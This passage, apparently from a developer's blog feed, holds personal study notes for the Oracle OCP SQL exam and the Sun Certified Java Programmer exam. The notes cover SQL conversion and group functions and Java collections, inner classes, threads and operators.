<span id="cb5-6"><a aria-hidden="true" href="#cb5-6" tabindex="-1"></a><span class="fu">add_months</span>(<span class="st">'24-JAN-09 18:45'</span>,<span class="dv">1</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">1830</span>: <span class="dt">date</span> format picture ends <span class="kw">before</span> converting entire input string</span></code></pre></div>
<ol start="4" type="1">
<li>Optional national language support parameters (nls_parameters) are
useful for specifying the language and format in which the names of date
and numeric elements are returned</li>
<li>Publicly available view called NLS_SESSION_PARAMETERS that contains
the NLS parameters for your current session. The default NLS_CURRENCY
value is the dollar symbol, but this can be changed at the user session
level ALTER SESSION set NLS_CURRENCY=‘GBP’;</li>
<li><code>TO_CHAR(number1, [format], [nls_parameter])</code></li>
</ol>
<div class="sourceCode" id="cb6"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a>Formats</span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a> <span class="dv">9</span> <span class="dt">Numeric</span> width</span>
<span id="cb6-3"><a aria-hidden="true" href="#cb6-3" tabindex="-1"></a> <span class="dv">0</span> Displays <span class="kw">leading</span> zeros Ex: <span class="dv">09999</span> <span class="dv">0012</span> <span class="dv">00012</span></span>
<span id="cb6-4"><a aria-hidden="true" href="#cb6-4" tabindex="-1"></a> . Position <span class="kw">of</span> <span class="dt">decimal</span> point</span>
<span id="cb6-5"><a aria-hidden="true" href="#cb6-5" tabindex="-1"></a> D <span class="dt">Decimal</span> separator position (period <span class="kw">is</span> <span class="kw">default</span>)</span>
<span id="cb6-6"><a aria-hidden="true" href="#cb6-6" tabindex="-1"></a> , Position <span class="kw">of</span> comma symbol</span>
<span id="cb6-7"><a aria-hidden="true" href="#cb6-7" tabindex="-1"></a> G <span class="kw">Group</span> separator position (comma <span class="kw">is</span> <span class="kw">default</span>)</span>
<span id="cb6-8"><a aria-hidden="true" href="#cb6-8" tabindex="-1"></a> $ Dollar <span class="fu">sign</span></span>
<span id="cb6-9"><a aria-hidden="true" href="#cb6-9" tabindex="-1"></a> L <span class="kw">Local</span> currency</span>
<span id="cb6-10"><a aria-hidden="true" href="#cb6-10" tabindex="-1"></a> MI Position <span class="kw">of</span> <span class="kw">minus</span> <span class="fu">sign</span> <span class="cf">for</span> negatives</span>
<span id="cb6-11"><a aria-hidden="true" href="#cb6-11" tabindex="-1"></a> PR Wrap negatives <span class="kw">in</span> parentheses</span>
<span id="cb6-12"><a aria-hidden="true" href="#cb6-12" tabindex="-1"></a>EEEE Scientific notation [Must be <span class="kw">only</span> <span class="dv">4</span> E<span class="st">'s and always gives in 1.xxxxxE+10 format]</span></span>
<span id="cb6-13"><a aria-hidden="true" href="#cb6-13" tabindex="-1"></a><span class="st"> U nls_dual_currency [if nls_dual_currency value is set]</span></span>
<span id="cb6-14"><a aria-hidden="true" href="#cb6-14" tabindex="-1"></a><span class="st"> V Multiplies by 10n times (n is the number of nines after V) Ex: 9999V99 3040 304000</span></span>
<span id="cb6-15"><a aria-hidden="true" href="#cb6-15" tabindex="-1"></a><span class="st"> S + or - sign is prefixed</span></span></code></pre></div>
<p>.. When a format mask is smaller than the number being converted, a
string of hash symbols is returned instead. .. When a format mask
contains fewer fractional components than the number, it is first
rounded to the number of decimal places in the format mask before being
converted.</p>
<ol start="7" type="1">
<li>TO_CHAR(date1, [format], [nls_parameter]) -> Default is
DD/MON/RR</li>
</ol>
<p>‘Month’ -> January ‘MOnth’ -> JANUARY ‘month’ -> january</p>
<p>‘Month’ -> padded with spaces ‘fmMonth’ -> Not padded with
spaces</p>
<p>Y-YYYY -> Year digits RR -> 2 digit year YEAR -> Case
Sensitive Full Year spelling MM, MON, MONTH -> 2 digit, Three char,
full month -> case sensitive D, DD, DDD -> day of week, month,
year DY -> 3 letter abbreviation DAY -> Case Sensitive day</p>
<p>only DAY, MONTH, YEAR are case sensitive AND PADDED NOT the shorter
forms</p>
<p>W, WW -> week of month, year Q -> Quarter CC -> Century S
before CC, YYYY, YEAR -> sign (-) for BC I-IYYY -> ISO year dates
for Y-YYYY BC, AD, B.C. and A.D. -> to display BC or AD J ->
Julian Day -> days since 31 December 4713 BC IW -> ISO standard
week (1 to 53) RM -> Roman numeral month</p>
<p>AM, PM, A.M. and P.M.-> Meridian Indicators HH, HH12 and HH24
-> Hour of day, 1-12 hours, and 0-23 hours MI, SS, SSSSS ->
Minutes. Seconds, Seconds past midnight</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a> <span class="op">-</span> <span class="op">/</span> . , ? # ! <span class="op">-></span> Punctuation marks <span class="cf">for</span> seperators</span>
<span id="cb7-2"><a aria-hidden="true" href="#cb7-2" tabindex="-1"></a> <span class="ot">"any literal"</span> <span class="op">-></span> simply displays <span class="kw">the</span> <span class="dt">character</span> literal</span>
<span id="cb7-3"><a aria-hidden="true" href="#cb7-3" tabindex="-1"></a> TH <span class="op">-></span> positional <span class="kw">or</span> ordinal text <span class="op">-></span> <span class="dv">12</span>th</span>
<span id="cb7-4"><a aria-hidden="true" href="#cb7-4" tabindex="-1"></a> SP <span class="op">-></span> spelled <span class="kw">out</span> <span class="dt">number</span></span>
<span id="cb7-5"><a aria-hidden="true" href="#cb7-5" tabindex="-1"></a> THSP <span class="kw">or</span> SPTH <span class="op">-></span> Spelled <span class="kw">out</span> <span class="kw">and</span> Ordinal <span class="dt">number</span> <span class="op">-></span> twelfth</span></code></pre></div>
<ol start="8" type="1">
<li>TO_DATE(string1, [format], [nls_parameter])</li>
</ol>
<div class="sourceCode" id="cb8"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a><span class="fu">to_date</span>(<span class="st">'25-DEC'</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">01840</span>: input <span class="fu">value</span> <span class="kw">not</span> <span class="dt">long</span> enough <span class="cf">for</span> <span class="dt">date</span> format</span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a><span class="fu">to_date</span>(<span class="st">'25-DEC'</span>, <span class="st">'DD-MON'</span>) <span class="op">-></span> <span class="dv">25</span><span class="op">-</span><span class="dt">DEC</span><span class="op">-</span><span class="dv">2009</span></span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a><span class="fu">to_date</span>(<span class="st">'25-DEC-10'</span>, <span class="st">'fxDD-MON-YYYY'</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">01862</span>: <span class="kw">the</span> <span class="dt">numeric</span> <span class="fu">value</span> does <span class="kw">not</span> match <span class="kw">the</span> <span class="fu">length</span> <span class="kw">of</span> <span class="kw">the</span> format item</span>
<span id="cb8-4"><a aria-hidden="true" href="#cb8-4" tabindex="-1"></a> fx <span class="op">-></span> Makes strict checking</span>
<span id="cb8-5"><a aria-hidden="true" href="#cb8-5" tabindex="-1"></a><span class="fu">to_date</span>(<span class="st">'25-DEC-10'</span>, <span class="st">'DD-MON-YYYY'</span>) <span class="op">-></span> <span class="dv">25</span><span class="op">-</span><span class="dt">DEC</span><span class="op">-</span><span class="dv">10</span> <span class="op">-></span> takes <span class="kw">as</span> <span class="dv">0010</span></span>
<span id="cb8-6"><a aria-hidden="true" href="#cb8-6" tabindex="-1"></a></span>
<span id="cb8-7"><a aria-hidden="true" href="#cb8-7" tabindex="-1"></a>Formats similar <span class="kw">to</span> Point <span class="dv">7</span> used <span class="cf">for</span> <span class="fu">TO_CHAR</span></span></code></pre></div>
<ol start="9" type="1">
<li>TO_NUMBER(string1, [format], [nls_parameter])</li>
</ol>
<div class="sourceCode" id="cb9"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a><span class="fu">to_number</span>(<span class="st">'$1,000.55'</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">1722</span>: invalid <span class="dt">number</span>.</span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a><span class="fu">to_number</span>(<span class="st">'$1,000.55'</span>,<span class="st">'$999,999.99'</span>) <span class="op">-></span> <span class="fl">1000.55</span></span>
<span id="cb9-3"><a aria-hidden="true" href="#cb9-3" tabindex="-1"></a></span>
<span id="cb9-4"><a aria-hidden="true" href="#cb9-4" tabindex="-1"></a><span class="cf">If</span> you <span class="fu">convert</span> a <span class="dt">number</span> <span class="kw">using</span> a shorter format mask, an error <span class="kw">is</span> returned <span class="op">-></span> RA<span class="op">-</span><span class="dv">1722</span>: invalid <span class="dt">number</span>.</span>
<span id="cb9-5"><a aria-hidden="true" href="#cb9-5" tabindex="-1"></a></span>
<span id="cb9-6"><a aria-hidden="true" href="#cb9-6" tabindex="-1"></a><span class="fu">TO_NUMBER</span>(<span class="fl">123.56</span>,<span class="st">'999.9'</span>) returns an error, <span class="cf">while</span> <span class="fu">TO_CHAR</span>(<span class="fl">123.56</span>,<span class="st">'999.9'</span>) returns <span class="dv">123</span>.<span class="fl">6.</span></span></code></pre></div>
<ol start="10" type="1">
<li><p>NVL(original, ifnull) -> both columns are mandatory :
ORA-00909: invalid number of arguments. .. nvl(substr(‘abc’,4),‘No
substring exists’) .. since there is no 4th character, it returns null
and hence the ‘No substring exists’ is returned</p></li>
<li><p>NVL2(original, ifnotnull, ifnull) .. The data types of the
ifnotnull and ifnull parameters must be compatible, and they cannot be
of type LONG. .. They must either be of the same type, or it must be
possible to convert ifnull to the type of the ifnotnull parameter. ->
ORA-01722: invalid number .. The data type returned by the NVL2 function
is the same as that of the ifnotnull parameter</p></li>
<li><p>NULLIF(ifunequal, comparison_term) -> returns NULL if both
terms are equal else the first term .. NO IMPLICIT conmversion ->
nullif(‘24-JUL-2009’,‘24-JUL-09’) returns the first term as these are
not equal</p></li>
<li><p>COALESCE(expr1, expr2,…,exprn), where expr1 is returned if it is
not null, else expr2 if it is not null, and so on ..
COALESCE(expr1,expr2) = NVL(expr1,expr2) .. COALESCE(expr1,expr2,expr3)
= NVL(expr1,NVL(expr2,expr3)) .. The data type COALESCE returns if a not
null value is found is the same as that of the first not null parameter.
.. To avoid an “ORA-00932: inconsistent data types” error, all not null
parameters must have data types compatible with the first not null
parameter</p></li>
<li><p>The DECODE function is specific to Oracle, while the CASE
expression is ANSI SQL compliant</p></li>
<li><p>DECODE(expr1,comp1, iftrue1, [comp2,iftrue2…[ compN,iftrueN]],
[iffalse])</p></li>
<li><p>CASE search_expr</p></li>
</ol>
<div class="sourceCode" id="cb10"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a><span class="cf">CASE</span> search_expr</span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a> <span class="cf">WHEN</span> comparison_expr1 <span class="cf">THEN</span> iftrue1</span>
<span id="cb10-3"><a aria-hidden="true" href="#cb10-3" tabindex="-1"></a> [<span class="cf">WHEN</span> comparison_expr2 <span class="cf">THEN</span> iftrue2</span>
<span id="cb10-4"><a aria-hidden="true" href="#cb10-4" tabindex="-1"></a> <span class="op">..</span></span>
<span id="cb10-5"><a aria-hidden="true" href="#cb10-5" tabindex="-1"></a> <span class="cf">WHEN</span> comparison_exprN <span class="cf">THEN</span> iftrueN</span>
<span id="cb10-6"><a aria-hidden="true" href="#cb10-6" tabindex="-1"></a> <span class="cf">ELSE</span> iffalse]</span>
<span id="cb10-7"><a aria-hidden="true" href="#cb10-7" tabindex="-1"></a> <span class="cf">END</span></span>
<span id="cb10-8"><a aria-hidden="true" href="#cb10-8" tabindex="-1"></a></span>
<span id="cb10-9"><a aria-hidden="true" href="#cb10-9" tabindex="-1"></a> <span class="cf">CASE</span></span>
<span id="cb10-10"><a aria-hidden="true" href="#cb10-10" tabindex="-1"></a> <span class="cf">WHEN</span> condition1 <span class="cf">THEN</span> iftrue1</span>
<span id="cb10-11"><a aria-hidden="true" href="#cb10-11" tabindex="-1"></a> [<span class="cf">WHEN</span> condition2 <span class="cf">THEN</span> iftrue2</span>
<span id="cb10-12"><a aria-hidden="true" href="#cb10-12" tabindex="-1"></a> <span class="op">..</span>.</span>
<span id="cb10-13"><a aria-hidden="true" href="#cb10-13" tabindex="-1"></a> <span class="cf">WHEN</span> conditionN <span class="cf">THEN</span> iftrueN</span>
<span id="cb10-14"><a aria-hidden="true" href="#cb10-14" tabindex="-1"></a> <span class="cf">ELSE</span> iffalse]</span>
<span id="cb10-15"><a aria-hidden="true" href="#cb10-15" tabindex="-1"></a> <span class="cf">END</span></span></code></pre></div>
<h3 id="chapter-6">Chapter 6</h3>
<ol type="1">
<li>COUNT({*|[DISTINCT|ALL] expr}) ; .. The ALL keyword is part of the
default syntax, so COUNT(ALL expr) and COUNT(expr) are equivalent ..
These count the number of nonnull occurrences of expr in each group ..
Data Type allowed: NUMBER, DATE, CHAR, or VARCHAR2</li>
<li>AVG([DISTINCT|ALL] expr) -> AVG(ALL expr) and AVG(expr) add the
nonnull values of expr for each row and divide the sum by the number of
nonnull rows in the group. .. Data Type allowed: NUMBER</li>
<li>SUM([DISTINCT|ALL] expr) -> Data Type allowed: NUMBER</li>
<li>MAX([DISTINCT|ALL] expr); MIN([DISTINCT|ALL] expr) .. Data Type
allowed: NUMBER, DATE, CHAR, or VARCHAR2</li>
<li>VARIANCE([DISTINCT|ALL] expr); STDDEV([DISTINCT|ALL] expr); ..
Statistical variance refers to the variability of scores in a sample or
set of data. .. VARIANCE(DISTINCT expr) returns the variability of
unique nonnull data in a group. .. STDDEV calculates statistical
standard deviation, which is the degree of deviation from the mean value
in a group. It is derived by finding the square root of the variance. ..
Data Type allowed: NUMBER</li>
<li>Group functions may only be nested two levels deep -> ORA-00935:
group function is nested too deeply.</li>
<li>Select Statement</li>
</ol>
<div class="sourceCode" id="cb11"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb11-1"><a aria-hidden="true" href="#cb11-1" tabindex="-1"></a><span class="kw">SELECT</span> <span class="kw">column</span>|expression|group_function(<span class="kw">column</span>|expression [alias]),<span class="op">..</span>.}</span>
<span id="cb11-2"><a aria-hidden="true" href="#cb11-2" tabindex="-1"></a> <span class="kw">FROM</span> <span class="kw">table</span></span>
<span id="cb11-3"><a aria-hidden="true" href="#cb11-3" tabindex="-1"></a> [<span class="kw">WHERE</span> condition(s)]</span>
<span id="cb11-4"><a aria-hidden="true" href="#cb11-4" tabindex="-1"></a> [<span class="kw">GROUP</span> <span class="kw">BY</span> {col(s)|expr}]</span>
<span id="cb11-5"><a aria-hidden="true" href="#cb11-5" tabindex="-1"></a> [<span class="kw">ORDER</span> <span class="kw">BY</span> {col(s)|expr|numeric_pos} [<span class="kw">ASC</span>|<span class="kw">DESC</span>] [<span class="kw">NULLS</span> <span class="fu">FIRST</span>|<span class="fu">LAST</span>]];</span></code></pre></div>
<ol start="8" type="1">
<li>If an item, which is not a group function, appears in the SELECT
list and there is no GROUP BY clause, -> ORA-00937: not a
single-group group function .. If a GROUP BY clause is present but that
item is not a grouping attribute, -> ORA-00979: not a GROUP BY
expression .. If a group function is placed in a WHERE clause ->
ORA-00934: group function is not allowed here</li>
<li>Select Statement</li>
</ol>
<div class="sourceCode" id="cb12"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a><span class="kw">SELECT</span> <span class="kw">column</span>|expression|group_function(<span class="kw">column</span>|expression [alias]),…}</span>
<span id="cb12-2"><a aria-hidden="true" href="#cb12-2" tabindex="-1"></a> <span class="kw">FROM</span> <span class="kw">table</span></span>
<span id="cb12-3"><a aria-hidden="true" href="#cb12-3" tabindex="-1"></a> [<span class="kw">WHERE</span> condition(s)]</span>
<span id="cb12-4"><a aria-hidden="true" href="#cb12-4" tabindex="-1"></a> [<span class="kw">GROUP</span> <span class="kw">BY</span> {col(s)|expr}]</span>
<span id="cb12-5"><a aria-hidden="true" href="#cb12-5" tabindex="-1"></a> [<span class="kw">HAVING</span> group_condition(s)]</span>
<span id="cb12-6"><a aria-hidden="true" href="#cb12-6" tabindex="-1"></a> [<span class="kw">ORDER</span> <span class="kw">BY</span> {col(s)|expr|numeric_pos} [<span class="kw">ASC</span>|<span class="kw">DESC</span>] [<span class="kw">NULLS</span> <span class="fu">FIRST</span>|<span class="fu">LAST</span>]];</span></code></pre></div>
<ol start="10" type="1">
<li><p>The HAVING clause can occur before the GROUP BY clause in the
SELECT statement. .. However, it is more common to place the HAVING
clause after the GROUP BY clause. .. All grouping is performed and group
functions are executed prior to evaluating the HAVING clause</p></li>
<li><p>NVL in Select clause only useful for display and NVL in WHERE or
HAVING is useful for modifying the values being verified ..
<code>NVL(x,0) -> 0</code> ..
<code>LENGTH(NVL(x,0)) -> 1</code></p></li>
</ol>
<p>Continued in <a href="studying-for-ocp-oracle-certifed-professional-part-2">Part
2</a></p>Aceing SCJP - Notes from Kathy Sierra Prep book - Part 22008-09-08T00:00:00-07:002008-09-08T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2008-09-08:/posts/aceing-scjp-notes-from-kathy-sierra-prep-book-part-2.htmlI recently completed the Sun Certified Java Programmer from Sun Microsystems and thought of sharing my notes from the Kathy Sierra SCJP preparation book which was the best material to prepare for this certification.<p>I recently completed the Sun Certified Java Programmer from Sun
Microsystems and thought of sharing my notes and gotchas from the Kathy
Sierra SCJP preparation book which was the best material to prepare for
this certification. All the below notes are material extracted from this
link:https://www.amazon.com/SCJP-Certified-Programmer-Java-310-065/dp/0071591060[Kathy
Sierra’s book]. The below notes are from the 2008 edition and might not
be reflective of the latest Chapter specifics.</p>
<p>This is the continuation of Continued in <a href="aceing-scjp-notes-from-kathy-sierra-prep-book-part-1">Part 1</a>
notes.</p>
<h3 id="chapter-7">Chapter 7</h3>
<ol type="1">
<li>Comparing two reference variables of different hierarchies gives
COMPILATION error</li>
<li>STRINGBUFFER does NOT have an overridden equals method. However,
STRING and WRAPPER classes have them</li>
<li><code>equals()</code> => Reflexive (x.x), Symmetric (x.y) and
Transitive (x.y.z) and consistent</li>
<li>If two objects are equal then their hashcodes should be equal</li>
<li><code>equals()</code> takes OBJECTas parameter and returns boolean.
Hashcode() returns int</li>
<li>Refer to Hashcode Contract and Table</li>
<li>Refer to Types of Collections</li>
<li>Only List and Set extend Collection not Map</li>
<li><code>java.util.Collection</code> is the Superclass for List and Set
while <code>java.util.Collections</code> is the class with
utilities</li>
<li>Refer to Collection Class Hierarchy</li>
<li>An implementation of collection can NEVER be Unordered if it is
sorted but all other combinations is possible</li>
<li><em>HashSet</em> - UnOrdered and UnSorted. <em>LinkedHashSet</em> -
Ordered and UnSorted</li>
<li>Vector(synchronized) and ArrayList are the Only to classes to
implement RandomAccess</li>
<li><em>LinkedHashSet</em> can be iterated in the Order of Entry or in
the Order of Last accessed(useful for caching)</li>
<li><em>TreeSet</em> uses a Red-Black Structure for the natural Ordering
and has a constructor for defining the natural ordering of the
Objects</li>
<li><em>Hashtable</em> is synchronized and does NOT allow a null key
while HashMap is not synchronized and allows one null key</li>
<li>Refer to Collection Interfaces and Concrete Implementation
Classes</li>
</ol>
<h3 id="chapter-8">Chapter 8</h3>
<ol type="1">
<li>Top Level Nested Class is an Inner class marked static</li>
<li>When trying to create an innerclass object outside the Outer Class
or in a Static method of the Outer Class, we need to CREATE an Object of
the Outer class -
<code>MyOuter.Myinner inObj = new MyOuter().new MyInner();</code></li>
<li>To Access the <em>this</em> object, the outer class <em>this</em> is
referred as <em>MyOuter.this</em> within the innerclass instance
members</li>
<li>The Inner class members can be STATIC only if the inner class itself
is declared as STATIC</li>
<li>Modifiers for the CLASS LEVEL inner class are : <em>final, abstract,
public</em> (allowed for all classes), <em>private, protected</em> and
<em>static</em> (only for inner classes)</li>
<li>Modifiers for the METHOD LEVEL inner class are: abstract and final
(cannot be used together)</li>
</ol>
<ul>
<li>Method Level inner Class CANNOT access the method local variables
unless it is marked final</li>
<li>It can access the class level variables</li>
<li>The class can be instantiated only within the method and it has to
be done only after the class declaration is completed</li>
</ul>
<ol start="7" type="1">
<li><code>Animal h = new Horse();</code> Here since the object is
determined at runtime ONLY THE OVERRIDEN METHODS of HORSE can be
accessed and the Animal methods can be accessed</li>
<li>For Anonymous Inner Class, we CANNOT create an altogether new Class.
We have to either extend or implement any existing class. This means we
can only OVERRIDE the methods available and NO new methods can be added
in Anonymous Inner Class(though new methods can be added, they CANNOT be
accessed at all outside the anonymous class as the object type would be
that of the superclass used.</li>
<li>In anonymous Inner class when you access the class object, it
extends or implements the superclass implicitly, hence the Constructors
will be called when the class instance is accessed</li>
<li><code>Runnable r = new Runnable()</code>; (compilation Error) as
Runnable is an Interface. However,
<code>Runnable r = new Runnable() {public void run(){}};</code> is
vaild</li>
<li>When the anonymous class is created within the argument of a method,
the closing semicolon appears after the argument close bracket.
<code>###> });</code></li>
<li>A static nested class does not have acccess to the member and
instance variables of the outer class. Look out for questions which does
this</li>
</ol>
<ul>
<li>Normal Class:
<code>MyOuter.MyInner inObj = new MyOuter().new MyInner();</code></li>
<li>Static Class:
<code>MyOuter.MyInner inObj = MyOuter.MyInner();</code></li>
</ul>
<ol start="13" type="1">
<li>Static Nested Class can have both static and non-static members but
can access ONLY the static members of the outer class</li>
<li>When an anonymous class implements an interface, it should override
the abstract methods else compilation error occurs</li>
<li>Check for the CORRECT Presence of the Semicolons before going into
the syntax and logic checking for inner classes
<code>Object o = new Horse("zippo"); Horse h = (Horse) o; o.eat();</code></li>
<li>If the cast to Horse is not done, then the object can access only
the OBJECT methods and the Horse Overriden ones only</li>
</ol>
<h3 id="chapter-9">Chapter 9</h3>
<ol type="1">
<li><code>start()</code>, <code>run()</code>, <code>yield()</code> and
<code>sleep()</code> - <em>Important methods in Threads</em></li>
<li>Types of Instantiating a Thread Class:</li>
</ol>
<ul>
<li>Extends Thread - <code>MyThread t = new MyThread();</code></li>
</ul>
<ol start="3" type="1">
<li>Implements Runnable -
<code>MyRunnable r = new MyRunnable(); Thread t = new Thread(r);</code></li>
<li>Calling the <code>run()</code> DOES NOT start a new stack though its
legal. We have to use <code>t.start()</code> for starting the execution
in a new stack</li>
<li>Methods for Influencing Execution Control of Threads</li>
</ol>
<ul>
<li>java.lang.Thread - static sleep(long), static yield(), final join(),
final setPriority(int)</li>
<li>java.lang.Object - final wait, final notify, final notifyAll()”</li>
</ul>
<ol start="6" type="1">
<li><code>sleep</code> - guaranteed to sleep for the given time except
InterruptedException</li>
<li><code>yield</code> - gives control back, not guaranteed not to
run</li>
<li><code>join</code> - guaranteed to stop execution until the joined
thread completes</li>
<li>All these three above methods keeps the lock acquired.</li>
<li>Notes about <em>synchronized</em> block:</li>
</ol>
<ul>
<li>Only methods can be synchronized</li>
<li>Only one lock</li>
<li>No need to synchronize all the methods in a class</li>
<li>multiple threads can still access the non-synchronized methods</li>
<li>When a thread goes to sleep, it takes the lock with it</li>
<li>when a thread acquires a lock on an object, no other method can
access any of the synchronized methods in the class</li>
<li>A thread can have multiple locks</li>
</ul>
<ol start="11" type="1">
<li><code>wait</code>, <code>notify</code> and
<code>notifyAll</code>(methods of java.lang.Object) should be called
from within a synchronized block because it has to own the lock before
waiting or notifying else will get IllegalMonitorStateException</li>
<li>Even when notify is called, the object lock will NOT be released
until the end of the synchronized block</li>
<li>Refer to Key Thread Methods</li>
<li>Check for <code>sleep()</code> or <code>wait()</code> method without
a try-catch block for checked (InterruptedException)</li>
<li>Check for the same thread being started twice</li>
<li>Check for synchronized being used on an non-object</li>
<li>Synchronizing the code that calls the calculating method DOES NOT
synchronize the action, the synchronized block needs to be applied to
the method doing the actual calculation.</li>
<li>Don’t synchronize the run() method or the code inside it as there
might be multiple threads created and each will have its own run method.
So synchronize the called method</li>
<li>When two threads are created and a single object is used for
accessing the methods, the wait, notify should be within synchronized
block as the thread should own the lock of the object before the methods
are called. Otherwise, it will throw a runtime exception</li>
<li>When superclass object reference is used for a sub class object,
only the OVERRIDEN methods can be accessed and the variables if printed
are from SUPER CLASS only</li>
<li>return type should always be immediately before the method name or
compilation error</li>
<li>A reference passed into a method is passed as if it were a copy of a
pointer pointer rather than the actual object. Thus if that reference is
assigned to a null it makes no difference to any other copy of that
pointer. Thus the code within the method findOut makes no difference to
any other references. Although reference z is assigned to null reference
y still points to the object so no objects are eligible for garbage
collection.</li>
<li>Because of the way twos complement number representation works the
unsigned right shift operation means a small shift in a negative number
can return a very large value so the output of option 1 will be much
larger than 10.</li>
<li>The unsigned right shift places no significance on the leading bit
that indicates the sign. For this shift the value 1 of the bit sign is
replaced with a zero turning the result into a positive number for
option 2.</li>
<li>Shifting can be done only on int, short or byte NOT on long and
ALWAYS returns an int (32 bit)</li>
<li>If shifting is done on a long, then the result is always a long (64
bit)</li>
<li>An else clause always belongs to the innermost if without an else,
irrespective of the indentation</li>
</ol>
<ul>
<li>In switch case, no two variables can be same</li>
<li>If switching on a byte, case 128 gives compilation error</li>
<li>Only final int can be used in a case, since the value must be
confirmed at compile time</li>
</ul>
<ol start="28" type="1">
<li>assertions are for situations that will never happen</li>
<li><code>assert(true check)</code> - Throws AssertionError if the tests
failed</li>
<li><code>assert(check) : expression</code> - check is always boolean
and expression is never void</li>
<li>assert is a keyword</li>
<li>If there is any statement between the label and the loop then, that
label is NOT recogonized and hence compliation error occurs. Also,
labels can be of the same name and the innermost one is taken into
consideration</li>
<li>Escape slashes are allowed only for b,t,n,f,r, “,’,<br/>
</li>
<li><code>#,%</code> cannot be used in a variable name and a number
cannot be used at the start of a variable name</li>
<li>If a variable is final then if the casting lies within the range,
casting is not needed. <code>final short s1 = 1;</code></li>
<li><code>byte s2 = s1;</code> - compiles correctly</li>
<li><em>true</em>, <em>false</em> and <em>null</em> are
case-SENSITIVE</li>
<li>A call to the super class method can be done using super.methodname
and can be placed anywhere in the method.(Static rule applies).Similarly
the superclass variables can be accessed using super.also</li>
<li>The REFERENCE type decides which overloaded method is being called,
while OBJECT type decides which overriden method is called. In fact,
<code>Animal a = new Horse(); a.eat("Carrots");</code> give COMPILATION
ERROR as the reference type is used for methods present check</li>
<li>When using <code>super()</code> or <code>this()</code> to invoke
constructors, they must be on the first line. Any methods that need to
be used needs to be static as the object would not be created until the
SUPER constructor completes</li>
<li><code>return (long) x/y</code> will give float as the cast is only
for x. Also int/int gives only int.</li>
<li>ALWAYS check the NUMERATOR and DENOMINATOR For the return type. If
wither Num or Denom is float or double then the result is also float or
double</li>
</ol>
<h3 id="miscellaneous">Miscellaneous</h3>
<ol type="1">
<li>First Check for Access Modifiers</li>
<li>Check for static refering no-static</li>
<li>Check for illegal subclassing</li>
<li>Watch for method or class names for keyword list. They are not
keywords - <code>x=3 ###> ~x = -4 ###> ~x = - (x +1)</code></li>
<li><code>int []a3,[]a4;</code> here after a comma only a variable
should be present</li>
<li>ALWAYS remember if one else is executed ,all the other else if/else
will NOT be executed</li>
<li>Even if the called method is static, <em>this</em> can NEVER be used
inside a static method</li>
<li><em>###</em> will work correctly for STRING values if No String
Objects are created. <code>"john"###"john"</code> works correctly.</li>
<li><code>start()</code> method is used to schedule a thread for
execution</li>
<li><em>protected void finalize() throws Throwable</em></li>
<li><em>concat()</em> is a method of String while append is for
StringBuffer</li>
<li>All the methods in StringBuffer are synchronized</li>
</ol>Aceing SCJP - Notes from Kathy Sierra Prep book - Part 12008-09-03T00:00:00-07:002008-09-03T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2008-09-03:/posts/aceing-scjp-notes-from-kathy-sierra-prep-book-part-1.htmlI recently completed the Sun Certified Java Programmer from Sun Microsystems and thought of sharing my notes from the Kathy Sierra SCJP preparation book which was the best material to prepare for this certification.<h3 id="chapter-1">Chapter 1</h3>
<ol type="1">
<li>Read the keywords list</li>
<li>Always check variable, class and method name for the keywords</li>
<li>Variable range is -2(bits – 1)</li>
<li>Ranges of primitive numbers</li>
<li>Octal (max): 21 digits and Hexadecimal (max): 16 digits without
leading 0 and 0x</li>
<li>Hexadecimal is case-Insensitive</li>
<li>Octal and Hexadecimal can be used for long also using L suffix</li>
<li>Unicode Character is represented as char x = ‘04E’</li>
<li>char being assigned out of range integer values (above 65535 or -ve
numbers needs a cast to (char)</li>
<li>Size should NOT be given when declaring an array int[5] x is
wrong</li>
<li>Primitive arrays initialize the variables to default value and
Object arrays to null</li>
<li>Negative numbers gives ArrayIndexOutOfBoundsException
(RuntimeException)</li>
<li>Arrays has a VARIABLE known as length</li>
<li>Size should NOT be given for anonymous array int[] x = new int[]
{4,5}</li>
<li>For primitives, smaller length values (char, byte and short) can be
placed in an int array</li>
<li>For Objects, its subclass reference variables can be placed in an
Object array</li>
<li>Primitive array variables cannot be assigned there restrictive
equivalent variables. Int[] x = char[] {6,7,8}. <strong>This is not
correct</strong></li>
<li>For Object, array variables CAN be assigned there subclass array
variables (unlike primitive variables)</li>
<li>Refer to Default Values for Primitive and Reference types</li>
<li>Class level String variables will be initialized only to NULL</li>
<li>Local and Class Level Array Variables will be initialized when the
array is INITIALIZED int[] a = new int[5]; This will make all the values
as 0 in the array, irrespective of where it is declared and
initialized</li>
<li>Local Variables (primitive and Object references) should always be
INITIALIZED before use, or compiler error</li>
</ol>
<h3 id="chapter-2">Chapter 2</h3>
<ol type="1">
<li><code>strictfp</code> is only for class and a method and NEVER for a
variable. It can be combined with either final or abstract.</li>
<li>If a method is ending with a semicolon then that class and the
method should be marked abstract (Not needed for interface).</li>
<li>A class can be marked only public or default access. (Not even
Protected is allowed)</li>
<li>If a class has default access, it can be accessed only within the
package level (not even above or sub-packages). Not even importing will
work.</li>
